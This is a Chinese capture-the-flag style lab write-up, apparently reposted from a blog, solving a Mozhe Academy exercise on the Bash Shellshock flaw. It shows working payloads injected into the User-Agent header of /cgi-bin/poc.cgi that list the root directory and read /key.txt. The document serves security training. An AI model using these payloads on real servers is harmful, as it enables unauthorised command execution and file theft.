码迷,mamicode.com
首页 > 其他好文 > 详细

[ 墨者学院 ] 命令执行——Bash漏洞分析溯源

时间:2019-06-27 10:55:00      阅读:127      评论:0      收藏:0      [点我收藏+]

标签:原因   网上   gen   描述   漏洞分析   agent   技术   follow   svi   

0x00.题目描述:

背景介绍

安全工程师"墨者"对一单位业务系统进行授权测试,在测试过程中,发现存在bash命令执行漏洞。

实训目标

1、了解bash;

2、了解Bash远程命令执行漏洞形成原因;

3、了解Bash远程命令执行漏洞利用方法;

解题方向

找到poc.cgi文件

 

0x01.题目分析:

根据题目说明,在网上对Bash远程命令执行漏洞进行了一番学习。

参考连接

freebuf:https://www.freebuf.com/vuls/44994.html

Seebug:https://www.seebug.org/vuldb/ssvid-88877

 

0x02.解题过程

通过网上的资料搜查,发现此漏洞存在的路径多数在网页/cgi-bin/下,结合题目给的提示,打开http://url/cgi-bin/poc.cgi

技术图片

构造执行语句插入到请求头的User-Agent头里面

User-Agent: () { :;}; echo; /bin/ls /

技术图片

然后构造执行语句查看key.txt

User-Agent: () { :;}; echo; /bin/cat /key.txt

技术图片

[ 墨者学院 ] 命令执行——Bash漏洞分析溯源

标签:原因   网上   gen   描述   漏洞分析   agent   技术   follow   svi   

原文地址:https://www.cnblogs.com/qtisec/p/11095444.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!